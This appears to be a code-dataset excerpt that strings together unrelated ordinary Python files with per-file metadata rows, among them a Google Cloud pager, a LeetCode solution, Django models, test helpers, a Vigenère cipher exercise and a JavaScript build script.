This class thinly wraps an initial
:class:`google.cloud.automl_v1.types.ListModelEvaluationsResponse` object, and
provides an ``__iter__`` method to iterate through its
``model_evaluation`` field.
If there are more pages, the ``__iter__`` method will make additional
``ListModelEvaluations`` requests and continue to iterate
through the ``model_evaluation`` field on the
corresponding responses.
All the usual :class:`google.cloud.automl_v1.types.ListModelEvaluationsResponse`
attributes are available on the pager. If multiple requests are made, only
the most recent response is retained, and thus used for attribute lookup.
"""
def __init__(self,
method: Callable[..., service.ListModelEvaluationsResponse],
request: service.ListModelEvaluationsRequest,
response: service.ListModelEvaluationsResponse,
*,
metadata: Sequence[Tuple[str, str]] = ()):
"""Instantiate the pager.
Args:
method (Callable): The method that was originally called, and
which instantiated this pager.
request (google.cloud.automl_v1.types.ListModelEvaluationsRequest):
The initial request object.
response (google.cloud.automl_v1.types.ListModelEvaluationsResponse):
The initial response object.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
"""
self._method = method
self._request = service.ListModelEvaluationsRequest(request)
self._response = response
self._metadata = metadata
def __getattr__(self, name: str) -> Any:
return getattr(self._response, name)
@property
def pages(self) -> Iterable[service.ListModelEvaluationsResponse]:
yield self._response
while self._response.next_page_token:
self._request.page_token = self._response.next_page_token
self._response = self._method(self._request, metadata=self._metadata)
yield self._response
def __iter__(self) -> Iterable[model_evaluation.ModelEvaluation]:
for page in self.pages:
yield from page.model_evaluation
def __repr__(self) -> str:
return '{0}<{1!r}>'.format(self.__class__.__name__, self._response)
class ListModelEvaluationsAsyncPager:
"""A pager for iterating through ``list_model_evaluations`` requests.
This class thinly wraps an initial
:class:`google.cloud.automl_v1.types.ListModelEvaluationsResponse` object, and
provides an ``__aiter__`` method to iterate through its
``model_evaluation`` field.
If there are more pages, the ``__aiter__`` method will make additional
``ListModelEvaluations`` requests and continue to iterate
through the ``model_evaluation`` field on the
corresponding responses.
All the usual :class:`google.cloud.automl_v1.types.ListModelEvaluationsResponse`
attributes are available on the pager. If multiple requests are made, only
the most recent response is retained, and thus used for attribute lookup.
"""
def __init__(self,
method: Callable[..., Awaitable[service.ListModelEvaluationsResponse]],
request: service.ListModelEvaluationsRequest,
response: service.ListModelEvaluationsResponse,
*,
metadata: Sequence[Tuple[str, str]] = ()):
"""Instantiates the pager.
Args:
method (Callable): The method that was originally called, and
which instantiated this pager.
request (google.cloud.automl_v1.types.ListModelEvaluationsRequest):
The initial request object.
response (google.cloud.automl_v1.types.ListModelEvaluationsResponse):
The initial response object.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
"""
self._method = method
self._request = service.ListModelEvaluationsRequest(request)
self._response = response
self._metadata = metadata
def __getattr__(self, name: str) -> Any:
return getattr(self._response, name)
@property
async def pages(self) -> AsyncIterable[service.ListModelEvaluationsResponse]:
yield self._response
while self._response.next_page_token:
self._request.page_token = self._response.next_page_token
self._response = await self._method(self._request, metadata=self._metadata)
yield self._response
def __aiter__(self) -> AsyncIterable[model_evaluation.ModelEvaluation]:
async def async_generator():
async for page in self.pages:
for response in page.model_evaluation:
yield response
return async_generator()
def __repr__(self) -> str:
return '{0}<{1!r}>'.format(self.__class__.__name__, self._response)
| apache-2.0 | -2,445,530,751,282,038,300 | 39.739018 | 95 | 0.64544 | false | 4.45745 | false | false | false |
feigaochn/leetcode | p263_ugly_number.py | 2 | 1435 | # coding: utf-8
# author: Fei Gao <[email protected]>
# Problem: ugly number
#
# Write a program to check whether a given number is an ugly number.
#
# Ugly numbers are positive numbers whose prime factors only include 2, 3, 5.
# For example, 6, 8 are ugly while 14 is not ugly since it includes another
# prime factor 7.
#
# Note that 1 is typically treated as an ugly number.
#
# Credits:Special thanks to @jianchao.li.fighter for adding this problem and
# creating all test cases.
#
# Subscribe to see which companies asked this question
#
# Show Tags
#
# Math
#
# Show Similar Problems
#
# (E) Happy Number
# (E) Count Primes
# (M) Ugly Number II
class Solution(object):
def isUgly(self, num):
"""
:type num: int
:rtype: bool
"""
if num < 1:
return False
if num == 1:
return True
ps = [2, 3, 5]
for p in ps:
while num % p == 0: num //= p
return num == 1
def main():
solver = Solution()
tests = [
((1,), True),
((2,), True),
((14,), False),
((-1,), False),
]
for params, expect in tests:
print('-' * 5 + 'TEST' + '-' * 5)
print('Input: ' + str(params))
print('Expect: ' + str(expect))
result = solver.isUgly(*params)
print('Result: ' + str(result))
pass
if __name__ == '__main__':
main()
pass
| mit | -5,159,015,496,010,155,000 | 20.41791 | 77 | 0.549129 | false | 3.337209 | false | false | false |
magicsky/nodechalk | chalk/Chalk.py | 1 | 2205 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# vim: tabstop=4 expandtab shiftwidth=4 softtabstop=4 fileencoding=utf-8 ff=unix ft=python
"""
@author: Wu Liang
@contact: [email protected]
@date: 2015/05/09
"""
from __future__ import absolute_import
from types import ModuleType
import sys
from chalk.SupportedColor import isSupportColor
class Chalk(ModuleType):
def __init__(self, selfModule):
self.selfModule = selfModule
self.styles = {
"modifiers": {
"reset": [0, 0],
"bold": [1, 22], # 21 isn't widely supported and 22 does the same thing
"dim": [2, 22],
"italic": [3, 23],
"underline": [4, 24],
"inverse": [7, 27],
"hidden": [8, 28],
"strikethrough": [9, 29]
},
"colors": {
"black": [30, 39],
"red": [31, 39],
"green": [32, 39],
"yellow": [33, 39],
"blue": [34, 39],
"magenta": [35, 39],
"cyan": [36, 39],
"white": [37, 39],
"gray": [90, 39]
},
"bgColors": {
"bgBlack": [40, 49],
"bgRed": [41, 49],
"bgGreen": [42, 49],
"bgYellow": [43, 49],
"bgBlue": [44, 49],
"bgMagenta": [45, 49],
"bgCyan": [46, 49],
"bgWhite": [47, 49]
}
}
def __getattr__(self, style):
def colorIt(s):
found = None
colored = s
for key in self.styles.keys():
value = self.styles[key]
for name in value.keys():
values = value[name]
if name != style:
continue
found = values
if isSupportColor() and found is not None:
colored = str(u'\u001b[') + str(found[0]) + "m" + s + str(u'\u001b[') + str(found[1]) + "m"
return colored
return colorIt
self = sys.modules[__name__]
sys.modules[__name__] = Chalk(self)
| mit | 8,145,812,429,696,313,000 | 28.797297 | 107 | 0.423583 | false | 3.834783 | false | false | false |
Net-ng/kansha | kansha/card_addons/label/models.py | 2 | 1149 | # -*- coding:utf-8 -*-
#--
# Copyright (c) 2012-2014 Net-ng.
# All rights reserved.
#
# This software is licensed under the BSD License, as described in
# the file LICENSE.txt, which you should have received as part of
# this distribution.
#--
from elixir import using_options
from elixir import ManyToOne, ManyToMany
from elixir import Field, Unicode, Integer
from kansha.models import Entity
class DataLabel(Entity):
"""Label mapper
"""
using_options(tablename='label')
title = Field(Unicode(255))
color = Field(Unicode(255))
board = ManyToOne('DataBoard')
cards = ManyToMany('DataCard', tablename='label_cards__card_labels')
index = Field(Integer)
def copy(self):
new_data = DataLabel(title=self.title,
color=self.color,
index=self.index)
return new_data
def remove(self, card):
self.cards.remove(card)
def add(self, card):
self.cards.append(card)
@classmethod
def get_by_card(cls, card):
q = cls.query
q = q.filter(cls.cards.contains(card))
return q.order_by(cls.index)
| bsd-3-clause | 4,538,223,466,102,745,000 | 24.533333 | 72 | 0.630983 | false | 3.706452 | false | false | false |
sciunto/scifig | libscifig/database.py | 1 | 2161 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import logging
import os.path
import hashlib
try:
import cPickle as pickle
except:
import pickle
def _calculate_checksum(filepath):
hasher = hashlib.md5()
with open(filepath, 'rb') as afile:
buf = afile.read()
hasher.update(buf)
return hasher.hexdigest()
def check_modification(name, dependencies, db_path):
"""
Check if at least one dependency changed.
:param name: name of the figure
:param dependencies: list of dependencies
:param db_path: path of the database
:returns: boolean
"""
logging.debug('Check modification for %s', name)
if not os.path.isfile(db_path):
logging.debug('No db, modif is True')
return True
cur_signature = {}
for dep in dependencies:
cur_signature[dep] = _calculate_checksum(dep)
with open(db_path, 'rb') as fh:
db = pickle.load(fh)
db = db.get(name)
if db is None:
logging.debug('name unknown in db, modif is True')
return True
for dep, md5 in cur_signature.items():
value = db.get(dep)
if value is None or value != md5:
logging.debug('value of %s is None or does not match, modif is True', dep)
return True
return False
def store_checksum(name, dependencies, db_path):
"""
Store the checksum in the db.
:param name: name of the figure
:param dependencies: list of dependencies
:param db_path: path of the database
"""
logging.debug('Store checksums in db')
# Calculate md5 sums
cur_signature = {}
for dep in dependencies:
cur_signature[dep] = _calculate_checksum(dep)
try:
with open(db_path, 'rb') as fh:
db = pickle.load(fh)
except FileNotFoundError:
db = {}
# Merge dict
db[name] = cur_signature
with open(db_path, 'wb') as fh:
pickle.dump(db, fh)
def erase_db(db_path):
"""
Erase a database.
:param db_path: path of the database
"""
logging.debug('Erase db')
with open(db_path, 'wb') as fh:
pickle.dump({}, fh)
| gpl-3.0 | 4,511,459,496,460,730,000 | 25.353659 | 90 | 0.600648 | false | 3.764808 | false | false | false |
hemio-ev/hamsql | test/utils.py | 2 | 3772 | import psycopg2
import subprocess
import time
import os.path
dburl = "postgres://postgres@/hamsql-test"
dburl_invalid = "postgres://postgresX@/hamsql-test"
def run(cmd, setup, delete_db=False, capture=False, invalid_connection=False, args=[]):
global dburl
settings = {}
path = 'hamsql'
params = [path, cmd, '-s', 'setups/' + setup]
if invalid_connection:
params += ['-c', dburl_invalid]
elif cmd != 'doc':
params += ['-c', dburl]
params += args
if delete_db:
params += [
'--permit-data-deletion',
'--delete-existing-database',
'--delete-residual-roles'
]
if capture:
settings.update({
'stdout': subprocess.PIPE,
'stderr': subprocess.PIPE,
'universal_newlines': True
})
return subprocess.run(params, **settings)
def runAssertSilent(cmd, setup, **xs):
completedProcess = run(cmd, setup, capture=True, **xs)
assertSilent(completedProcess)
return completedProcess
def assertSilent(completedProcess):
assert completedProcess.returncode == 0
assert completedProcess.stdout == ""
assert completedProcess.stderr == ""
def assertError(completedProcess, err):
assert completedProcess.returncode == 1
assert completedProcess.stdout == ""
assert err in completedProcess.stderr
def assertStdErr(completedProcess, err):
assert completedProcess.returncode == 0
assert completedProcess.stdout == ""
assert err in completedProcess.stderr
def assertStdOut(completedProcess, out):
assert completedProcess.returncode == 0
assert out in completedProcess.stdout
assert completedProcess.stderr == ""
def check(domains=[], functions=[], tables=[], roles=[]):
conn, cur = db_open()
assert sorted(domains) == sorted(db_domains(cur))
assert sorted(functions) == sorted(db_functions(cur))
assert sorted(tables) == sorted(db_tables(cur))
assert sorted(roles) == sorted(db_roles(cur))
db_close(conn, cur)
def db_open():
global dburl
conn = psycopg2.connect(dburl + '?application_name=pytest')
cur = conn.cursor()
return conn, cur
def db_close(conn, cur):
cur.close()
conn.close()
def db_roles(cur):
cur.execute("""
SELECT
rolname
,rolsuper
,rolinherit
,rolcreaterole
,rolcreatedb
,rolcanlogin
,rolconnlimit
,rolbypassrls
,rolconfig
FROM
pg_catalog.pg_roles
WHERE rolname LIKE 'hamsql-test_%'
""")
return cur.fetchall()
def db_domains(cur):
cur.execute("""
SELECT domain_catalog, domain_name, domain_schema, udt_name, character_maximum_length, domain_default
FROM information_schema.domains
WHERE domain_schema <> 'information_schema'
""")
return cur.fetchall()
def db_tables(cur):
cur.execute("""
SELECT table_schema, table_name, table_type
FROM information_schema.tables
WHERE table_schema NOT IN ('information_schema', 'pg_catalog')
""")
return cur.fetchall()
def db_functions(cur):
cur.execute("""
SELECT
n.nspname
,p.proname
,ARRAY(SELECT UNNEST(p.proargtypes::regtype[]::varchar[]))
,prorettype::regtype::varchar
,proargnames
,prosecdef
FROM pg_catalog.pg_proc AS p
JOIN pg_namespace AS n ON p.pronamespace = n.oid AND
NOT n.nspname LIKE 'pg_%' AND
n.nspname NOT IN ('information_schema')
WHERE p.probin IS NULL
""")
return cur.fetchall()
| gpl-3.0 | 4,227,699,176,388,237,300 | 27.575758 | 109 | 0.599682 | false | 4.082251 | false | false | false |
moodpulse/l2 | api/parse_file/views.py | 1 | 1663 | import tempfile
from django.http import HttpRequest, JsonResponse
from api.parse_file.pdf import extract_text_from_pdf
import simplejson as json
from api.views import endpoint
from appconf.manager import SettingManager
def dnk_covid(request):
prefixes = []
key_dnk = SettingManager.get("dnk_kovid", default='false', default_type='s')
to_return = None
for x in "ABCDEF":
prefixes.extend([f"{x}{i}" for i in range(1, 13)])
file = request.FILES['file']
if file.content_type == 'application/pdf' and file.size < 100000:
with tempfile.TemporaryFile() as fp:
fp.write(file.read())
text = extract_text_from_pdf(fp)
if text:
text = text.replace("\n", "").split("Коронавирусы подобные SARS-CoVВККоронавирус SARS-CoV-2")
to_return = []
if text:
for i in text:
k = i.split("N")
if len(k) > 1 and k[1].split(" ")[0].isdigit():
result = json.dumps({"pk": k[1].split(" ")[0], "result": [{"dnk_SARS": "Положительно" if "+" in i else "Отрицательно"}]})
to_return.append({"pk": k[1].split(" ")[0], "result": "Положительно" if "+" in i else "Отрицательно"})
http_func({"key": key_dnk, "result": result}, request.user)
return to_return
def http_func(data, user):
http_obj = HttpRequest()
http_obj.POST.update(data)
http_obj.user = user
endpoint(http_obj)
def load_file(request):
results = dnk_covid(request)
return JsonResponse({"ok": True, "results": results})
| mit | 6,391,463,727,328,777,000 | 35.790698 | 141 | 0.596713 | false | 3.077821 | false | false | false |
ska-sa/katdal | katdal/flags.py | 1 | 1652 | ################################################################################
# Copyright (c) 2019, National Research Foundation (Square Kilometre Array)
#
# Licensed under the BSD 3-Clause License (the "License"); you may not use
# this file except in compliance with the License. You may obtain a copy
# of the License at
#
# https://opensource.org/licenses/BSD-3-Clause
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
################################################################################
"""Definitions of flag bits"""
NAMES = ('reserved0', 'static', 'cam', 'data_lost',
'ingest_rfi', 'predicted_rfi', 'cal_rfi', 'postproc')
DESCRIPTIONS = ('reserved - bit 0',
'predefined static flag list',
'flag based on live CAM information',
'no data was received',
'RFI detected in ingest',
'RFI predicted from space based pollutants',
'RFI detected in calibration',
'some correction/postprocessing step could not be applied')
STATIC_BIT = 1
CAM_BIT = 2
DATA_LOST_BIT = 3
INGEST_RFI_BIT = 4
PREDICTED_RFI_BIT = 5
CAL_RFI_BIT = 6
POSTPROC_BIT = 7
STATIC = 1 << STATIC_BIT
CAM = 1 << CAM_BIT
DATA_LOST = 1 << DATA_LOST_BIT
INGEST_RFI = 1 << INGEST_RFI_BIT
PREDICTED_RFI = 1 << PREDICTED_RFI_BIT
CAL_RFI = 1 << CAL_RFI_BIT
POSTPROC = 1 << POSTPROC_BIT
| bsd-3-clause | 3,509,311,591,821,161,000 | 36.545455 | 80 | 0.6023 | false | 3.84186 | false | false | false |
rakvat/direktkreditverwaltung | dkapp/migrations/0003_auto_20200728_1929.py | 1 | 2115 | # Generated by Django 3.0.8 on 2020-07-28 17:29
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('dkapp', '0002_auto_20200726_1744'),
]
operations = [
migrations.AlterField(
model_name='accountingentry',
name='created_at',
field=models.DateTimeField(),
),
migrations.AlterField(
model_name='accountingentry',
name='date',
field=models.DateField(),
),
migrations.AlterField(
model_name='accountingentry',
name='updated_at',
field=models.DateTimeField(),
),
migrations.AlterField(
model_name='contact',
name='created_at',
field=models.DateTimeField(),
),
migrations.AlterField(
model_name='contact',
name='updated_at',
field=models.DateTimeField(),
),
migrations.AlterField(
model_name='contract',
name='created_at',
field=models.DateTimeField(),
),
migrations.AlterField(
model_name='contract',
name='updated_at',
field=models.DateTimeField(),
),
migrations.AlterField(
model_name='contractversion',
name='created_at',
field=models.DateTimeField(),
),
migrations.AlterField(
model_name='contractversion',
name='duration_months',
field=models.IntegerField(blank=True, null=True),
),
migrations.AlterField(
model_name='contractversion',
name='duration_years',
field=models.IntegerField(blank=True, null=True),
),
migrations.AlterField(
model_name='contractversion',
name='start',
field=models.DateField(),
),
migrations.AlterField(
model_name='contractversion',
name='updated_at',
field=models.DateTimeField(),
),
]
| gpl-3.0 | -7,953,272,076,920,990,000 | 27.972603 | 61 | 0.526714 | false | 5 | false | false | false |
riolet/SAM | sam/local/rv.py | 2 | 2842 | map_title = "Pam"
meta_title = "Tsoh Sliated"
stats_title = "Stats"
table_title = "Elbat Weiv"
login_title = "Nigol"
settings_title = "Sngittes"
dashboard_title = "Draobhsad"
units_role_cc = "tneilc"
units_role_c = "yltsom tneilc"
units_role_cs = "dexim tneilc/revres"
units_role_s = "yltsom revres"
units_role_ss = "revres"
units_kilo = "K"
units_mega = "M"
units_giga = "G"
units_bytes = "B" # bytes
units_kbytes = "BK"
units_mbytes = "BM"
units_gbytes = "BG"
units_tbytes = "BT"
units_bps = "B/s" # bytes per second
units_kbps = "BK/s"
units_mbps = "BM/s"
units_gbps = "BG/s"
units_tbps = "BT/s"
units_pps = "p/s" # packets per second
units_kpps = "pK/s"
units_mpps = "pM/s"
units_gpps = "pG/s"
units_tpps = "pT/s"
stats_udips = "Euqinu noitanitsed PI sesserdda:"
stats_usips = "Euqinu ecruos PI sesserdda:"
stats_uips = "Euqinu PI sesserdda:"
stats_ports = "Euqinu noitanitsed strop desu:"
stats_sports = "Euqinu metsys strop desu (0..1023):"
stats_uports = "Euqinu resu strop desu (1024..49151):"
stats_pports = "Euqinu etavirp strop desu (49152..65535):"
stats_ports_max = "Xam strop rof eno noitanitsed:"
stats_ports_few = "Tnecrep fo snoitanitsed htiw rewef naht 10 strop: "
stats_conns = "Latot rebmun fo tcnitsid snoitcennoc (edon -> edon:trop) derots:"
stats_conns_many = "Rebmun fo tcnitsid snoitcennoc gnirrucco erom naht 100 semit:"
stats_hosts = "Latot stsoh dedrocer"
stats_overall = "Llarevo"
stats_datasource = "Ecruosatad: {}"
table_col_address = "Sserdda"
table_col_alias = "Enamtsoh"
table_col_conn_in = "Latot dnuobni snoitcennoc"
table_col_conn_out = "Latot fnuobtuo snoitcennoc"
table_col_role = "Elor (0 = tneilc, 1 = revres)"
table_col_environment = "Tnemnorivne"
table_col_tags = "Sgat"
table_col_bytes = "Setyb deldnah"
table_col_packets = "Stekcap deldnah"
table_col_protocols = "Desu Slocotorp"
table_proto_i = "(ni)" # in (inbound)
table_proto_o = "(tuo)" # out (outbound)
table_proto_io = "(i/o)" # in / out
table_spread = "Stluser: {0} ot {1}"
table_spread_none = "On gnihctam stluser."
meta_none = "On tsoh dnuof ta siht sserdda"
meta_src = "Ecruos PI"
meta_dst = "Tsed. PI"
meta_port = "Tsed. Trop"
meta_ports = "Trop Dessecca"
meta_links = "Tnuoc / Nim"
meta_protocols = "Slocotorp"
meta_sum_bytes = "Mus Setyb"
meta_avg_bytes = "Gva Setyb"
meta_sum_packets = "Mus Stekcap"
meta_avg_packets = "Gva Stekcap"
meta_avg_duration = "Gva Noitarud"
meta_child_ip = "Sserdda"
meta_child_name = "Eman"
meta_child_count = "Evitca Stniopdne"
meta_child_ratio = "Elor (0=tneilc, 1=revres)"
login_LDAP_missing = "PADL eludom ton dellatsni. Tonnac mrofrep nigol.."
login_LDAP_error = "Dluoc ton tcennoc ot PADL revres: {}. Kcehc noitarugifnoc."
login_blank_pass = "Drowssap yam ton eb knalb."
login_blank_user = "Resu yam ton eb knalb."
login_invalid = "Dilavni slaitnederc."
login_failed = "Nigol deliaf."
| gpl-3.0 | 1,502,175,834,318,290,400 | 31.295455 | 82 | 0.701619 | false | 2.196291 | false | true | false |
glottobank/pycldf | tests/test_paralleltext.py | 1 | 1119 | from pathlib import Path
import pytest
from pycldf.dataset import ParallelText
@pytest.fixture
def ds(tmpdir):
ds = ParallelText.in_dir(str(tmpdir))
ds.add_component('FunctionalEquivalentTable')
ds.add_component('FunctionalEquivalentsetTable')
for fname in [
'forms.csv',
'functionalEquivalents.csv',
'functionalEquivalentsets.csv',
]:
src = Path(__file__).parent / 'data' / 'paralleltext_{0}'.format(fname)
target = tmpdir.join(fname)
target.write(src.read_text(encoding='utf-8').encode('utf8'), mode='wb')
return ds
def test_paralleltext(ds):
ds.validate()
assert len(list(ds[ds.primary_table])) == 9
def test_get_equivalent(ds):
for fes in ds['FunctionalEquivalentsetTable']:
if fes['Description'] == 'Jesus Christ':
break
else:
raise ValueError # pragma: no cover
equiv = [
ds.get_equivalent(r) for r in ds['FunctionalEquivalentTable']
if r['FunctionalEquivalentset_ID'] == fes['ID']]
assert equiv == [['Jesu'], ['Jisas\u0268', 'Kiraisoy\xe1'], ['Jisas', 'Krais']]
| apache-2.0 | -6,987,609,921,863,617,000 | 27.692308 | 83 | 0.636282 | false | 3.380665 | false | false | false |
gengwg/leetcode | 112_path_sum.py | 1 | 1183 | # 112. Path Sum
# Given a binary tree and a sum,
# determine if the tree has a root-to-leaf path
# such that adding up all the values along the path equals the given sum.
#
# For example:
# Given the below binary tree and sum = 22,
# 5
# / \
# 4 8
# / / \
# 11 13 4
# / \ \
# 7 2 1
#
# return true, as there exist a root-to-leaf path 5->4->11->2 which sum is 22.
class TreeNode:
def __init__(self, x):
self.val = x
self.left = None
self.right = None
class Solution:
def hasPathSum(self, root, sum):
if root is None:
return False
# leaf node
if root.left is None and root.right is None and root.val == sum:
return True
# reduce sum by node value at each recursion
return self.hasPathSum(root.left, sum - root.val) or self.hasPathSum(root.right, sum - root.val)
if __name__ == "__main__":
root = TreeNode(5)
root.left = TreeNode(4)
root.right = TreeNode(8)
root.left.left = TreeNode(11)
root.left.left.right = TreeNode(2)
print Solution().hasPathSum(root, 22)
| apache-2.0 | -5,073,569,330,014,601,000 | 25.288889 | 104 | 0.556213 | false | 3.399425 | false | false | false |
RokKos/FRI_Programiranje | TTK/DN01/Vigenere.py | 1 | 3509 | from string import ascii_lowercase
from math import gcd
# Constants
kN = len(ascii_lowercase)
kStartAscii = ord(ascii_lowercase[0])
kFILE_NAME = "TheHitchhikersGuidetotheGalaxy.txt"
# Helpers
def AsciiValue(char):
return ord(char) - kStartAscii
def CharValue(num):
return chr(num + kStartAscii)
def TransformText(original, key, add_sub):
text = ""
for idx,val in enumerate(original):
lowr = val.lower()
ascii_num = AsciiValue(lowr)
i = idx % len(key)
ascii_num += add_sub * AsciiValue(key[i])
ascii_num %= kN
text += CharValue(ascii_num)
return text
def Encrypt(b,k):
return TransformText(b,k, 1)
def Decrypt(c, k):
return TransformText(c,k, -1)
def AllDivisors(num):
divisors = [3]
i = 4
while i*i <= num:
if (num % i == 0):
divisors.append(i)
i += 1
return divisors
def PossibleLen(num):
return list(range (3, num // 2))
def FindLenghtOfKey(cripted_text):
ct_len = len(cripted_text)
possible_pattern_search = AllDivisors(ct_len)
#print (possible_pattern_search)
distances = []
for patter_len in possible_pattern_search:
upper_bound = ct_len if ct_len % patter_len == 0 else ct_len - patter_len
for i in range(0,upper_bound, patter_len):
for j in range(i + patter_len, upper_bound, patter_len):
matching = True
for k in range(patter_len):
#print (i,j,k, patter_len, ct_len)
if (cripted_text[i+k] != cripted_text[j+k]):
matching = False
break
if (matching):
distances.append(j - i - patter_len)
print (distances)
l_d = len(distances)
gcd_distances = distances[0]
if (l_d >= 2):
for d in range(1, l_d):
gcd_distances = gcd(gcd_distances, distances[d])
return gcd_distances
def BreakTextIntoBlocks(text, lengh_of_blocks):
blocks = ["" for _ in range(lengh_of_blocks)]
for ind, val in enumerate(text):
blocks[ind % lengh_of_blocks] += val
return blocks
def FrequencyAnalysis(cripted_text):
frequencies = [0 for _ in range(kN)]
for c in cripted_text:
frequencies[AsciiValue(c)] += 1
print (frequencies)
return frequencies
def FindKey(cripted_text):
key_len = FindLenghtOfKey(cripted_text)
text_blocks = BreakTextIntoBlocks(cripted_text, key_len)
key = ""
for block in text_blocks:
freq = FrequencyAnalysis(block)
print (CharValue(freq.index(max(freq))))
char_from_key = abs(freq.index(max(freq)) - AsciiValue('t'))
key += CharValue(char_from_key)
return key
if __name__ == "__main__" :
#print (Encrypt("abc", "abc"))
#print (Encrypt("abc", "z"))
#print (Encrypt("abc", "y"))
#print (Decrypt("ace", "abc"))
#print (Decrypt("zab", "z"))
#print (Decrypt("yza", "y"))
#print (FindLenghtOfKey(Encrypt("abcijkabcoplabc", "abc")))
#print (FindLenghtOfKey(Encrypt("abcijkabcoplabce", "abcd")))
#print (FindKey(Encrypt("abcijkabcoplabc", "abc")))
content = ""
with open(kFILE_NAME) as f:
content = f.readlines()
#print(content)
cripted_text = Encrypt(content[0], "abc")
key = FindKey(cripted_text)
print (key)
original = Decrypt(cripted_text, key)
print (original)
print (content[0].lower())
print (content[0].lower() == original)
| mit | -6,810,865,207,348,621,000 | 26.629921 | 81 | 0.591052 | false | 3.204566 | false | false | false |
gusmaogabriels/mkin4py | mkin4py/solver/linsolver.py | 1 | 2121 | # -*- coding: utf-8 -*-
from __future__ import division, absolute_import, print_function
from . import np as __np, linalg as __linalg, derivatives as __derivatives
from .params import convergence_params
from ..bases import mkmodel as __mk
def newton_type(param):
""" lin_solver
params(1) : param as int
param = 1 -> Jacobian solution
param = 2 -> returns param = 1 and Hessian Matrix
"""
psi, jacobian, hessian = __derivatives.analytical(param)
jacobian = __np.dot(__mk.maps['msas'],jacobian).T
f = __np.dot(__mk.maps['msas'],psi)
# add white noise to the Jacobian with std of the linear problem solver converfence criteria
#jacobian += __np.random.normal(0,convergence_params['criteriaqmr'],jacobian.shape)
# solution algorithm
dcoverage = __np.array(__linalg.qmr(jacobian.T,-f*convergence_params['hfun'],\
tol = convergence_params['inner_criteria'],maxiter=convergence_params['inner_convtol'])[0])
if param == 2 and max(abs(dcoverage))<1:
count = 0
fhessp = lambda dconv,M : __np.dot(M.T,dconv)
dhess = __np.empty([len(psi),len(__mk.xsurface)])
vhess = __np.empty([len(psi),1])
while count <= convergence_params['convtolH']:
for i in range(0,len(psi)):
dhess[i,:] = fhessp(dcoverage,hessian[:,:,i])
vhess[i,:] = __np.dot(dhess[i,:],dcoverage)
mhess = __np.dot(__mk.maps['msas'],dhess).T
vhess = __np.dots(__mk.maps['msas'],vhess)
dcoverage2 = __np.array(__linalg.qmr((jacobian+mhess).T,\
-(f+__np.dot(jacobian.T,dcoverage)+0.5*vhess)))[0]
dcoverage += dcoverage2
count+=1
else:
pass
for i in range(len(dcoverage)):
if __np.isnan(dcoverage[i]):
dcoverage[i] = convergence_params['delta_min']
elif __np.isinf(dcoverage[i]):
if dcoverage[i]>0:
dcoverage[i] = convergence_params['delta_min']
else:
dcoverage[i] = -convergence_params['delta_min']
else:
pass
return dcoverage
| mit | -4,942,007,584,744,219,000 | 42.285714 | 96 | 0.584158 | false | 3.460033 | false | false | false |
KatsuomiK/HTML5Shooter | build/build.py | 1 | 2556 | #! /usr/bin/python
import os
import base64
def list_files(dir):
list = []
for root, dirs, files in os.walk(dir):
for file in files:
fullpath = os.path.join(root, file).replace("\\", "/")
list.append(fullpath)
return list
def remove_files(list, files):
for file in files:
if file in list:
list.remove(file)
def convert_image_files(output_file, image_files, property):
if len(image_files) > 0:
output = "var " + property + " = {\n"
for file in image_files:
print(file)
id = file.replace("./", "")
fin = open(file, "rb")
binary = fin.read()
fin.close()
output += '\t"' + id + '" : "data:image/png;base64,' + base64.b64encode(binary).decode('ascii') + '",\n'
output = output[0:-2]
output += "\n};\n"
with open(output_file, "w") as fout:
fout.write(output)
def concat_files(output_file, in_files):
with open(output_file, "w", encoding='utf-8') as fout:
for file in in_files:
print(file)
with open(file, encoding='utf-8') as fin:
src = fin.read()
fout.write(src)
PROJECT_JS = "build/bin/HTML5Shooter.js"
PROJECT_OPTIMIZED_JS = "build/bin/HTML5Shooter-min.js"
SOURCE_MAP_JS = "build/bin/HTML5Shooter-min.js.map"
# create gamelib.js
GAMELIB_JS = "build/bin/gamelib.js"
GAMELIB_HEADER = "gamelib/header.js"
os.chdir("..")
gamelib_files = list_files("gamelib")
remove_files(gamelib_files, [GAMELIB_HEADER])
gamelib_files = [GAMELIB_HEADER] + gamelib_files
concat_files(GAMELIB_JS, gamelib_files)
# create images.js
IMAGES_JS = "build/obj/images.js"
os.chdir('resources/images');
image_files = list_files('.')
convert_image_files("../../" + IMAGES_JS, image_files, 'IMAGES');
os.chdir("../../");
# create project .js
files = [GAMELIB_JS, IMAGES_JS] + list_files("src")
concat_files(PROJECT_JS, files)
# create optimized project .js
#compiler = "java -jar build/compiler.jar --compilation_level ADVANCED_OPTIMIZATIONS --js " + PROJECT_JS + " --js_output_file " + PROJECT_OPTIMIZED_JS + " --create_source_map " + SOURCE_MAP_JS + " --source_map_format=V3"
#os.system(compiler)
optimize = "uglifyjs " + PROJECT_JS + " > " + PROJECT_OPTIMIZED_JS
os.system(optimize)
| mit | -1,062,201,311,078,490,500 | 23.306931 | 220 | 0.552817 | false | 3.235443 | false | false | false |
allmightyspiff/softlayer-python | SoftLayer/shell/cmd_help.py | 3 | 1103 | """Print help text."""
# :license: MIT, see LICENSE for more details.
import click
from click import formatting
from SoftLayer.CLI import core as cli_core
from SoftLayer.CLI import environment
from SoftLayer.shell import routes
@click.command()
@environment.pass_env
@click.pass_context
def cli(ctx, env):
"""Print shell help text."""
env.out("Welcome to the SoftLayer shell.")
env.out("")
formatter = formatting.HelpFormatter()
commands = []
shell_commands = []
for name in cli_core.cli.list_commands(ctx):
command = cli_core.cli.get_command(ctx, name)
if command.short_help is None:
command.short_help = command.help
details = (name, command.short_help)
if name in dict(routes.ALL_ROUTES):
shell_commands.append(details)
else:
commands.append(details)
with formatter.section('Shell Commands'):
formatter.write_dl(shell_commands)
with formatter.section('Commands'):
formatter.write_dl(commands)
for line in formatter.buffer:
env.out(line, newline=False)
| mit | -4,125,463,605,830,137,300 | 26.575 | 53 | 0.663645 | false | 3.925267 | false | false | false |
imron/scalyr-agent-2 | benchmarks/scripts/print_compression_algorithm_results.py | 2 | 3953 | #!/usr/bin/env python
